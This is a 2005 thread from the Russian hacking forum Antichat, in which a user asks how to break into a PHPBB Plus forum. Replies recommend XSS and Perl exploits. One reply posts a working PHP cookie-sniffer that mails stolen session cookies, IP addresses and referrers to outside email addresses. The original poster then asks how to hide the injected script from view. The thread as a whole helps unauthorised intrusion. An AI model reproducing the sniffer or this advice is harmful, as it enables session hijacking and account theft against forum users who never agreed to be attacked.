Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
04.12.2005, 04:31
|
|
Познавший АНТИЧАТ
Регистрация: 19.07.2005
Сообщений: 1,000
Провел на форуме:
5868159
Репутация:
950
|
|
Взлом PHPBB Plus
Подскажите как его ломануть очень надо.По XSS нейподет этот сайт у меня в сети.
|
|
|
04.12.2005, 09:48
|
|
Новичок
Регистрация: 21.10.2005
Сообщений: 11
Провел на форуме:
75734
Репутация:
3
|
|
Почему это XSS непойдет? Главное понимать принципы. Если это web-чат то ничего тебе не мешает использовать там xss.
Последний раз редактировалось DeathLess; 04.12.2005 в 09:53..
|
|
|
|
04.12.2005, 11:54
|
|
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463
Репутация:
2258
|
|
DeathLess какой веб чат?? это пхпбб форум
cardons, пробуй хсс , перл сплойты ( но лучший и рабочий вариант ХСС , если не конечно не самая последняя версия форума)
__________________
Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
|
|
|
|
04.12.2005, 12:21
|
|
Постоянный
Регистрация: 22.01.2005
Сообщений: 764
Провел на форуме:
1086047
Репутация:
67
|
|
ну, во-первых, кросс-сайт-скриптинг не тока в интернете работает), ты же можешь прям в сети сниффер разместить у себя на хосте, что к сожалению при обнаружении атаки плохо отразится на твоей безопасности...
-простейший сниффер:
Код:
<?
if(isset($QUERY_STRING))
{
$date=date('d.m.y : H:i:s');
mail("mail1@mail.ru, mail2@mail.ru", "Kyka npuIIIJIa", "Date and Time: $date\n IP: $REMOTE_ADDR\n Adress: $HTTP_REFERER\n Cookie: $QUERY_STRING");
}
?>
- правда лучше сделай чтобы в файл писалось, чтобы не заморачиваться с мэйл серваками... (мануалы по php или перлу ищи на emanual.ru)
Во-вторых, насколько я понял, это все тот же форум phpbb, а вовсе не чат, но так и не нашел ответа, отличается ли он чем-нить от простого? (без плюса)
В третьих, не верится, что существует лишь одна рабочая версия этого форума, так что плз, пиши сюда нам версию, либо сам смотри на сайтах http://www.security.nnov.ru/
http://securitylab.ru/ |
|
|
|
05.12.2005, 08:15
|
|
Познавший АНТИЧАТ
Регистрация: 19.07.2005
Сообщений: 1,000
Провел на форуме:
5868159
Репутация:
950
|
|
Версия 1.52.Cплойтов у меня нету нифига.Щас доделаю сниф тока что писать как для простого phpbb?Просто подскажите что писать чтоб небыло видно этого текста.
|
|
|
|
05.12.2005, 15:11
|
|
Постоянный
Регистрация: 22.01.2005
Сообщений: 764
Провел на форуме:
1086047
Репутация:
67
|
|
найди похожую системку в инете, ковыряться надо...
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
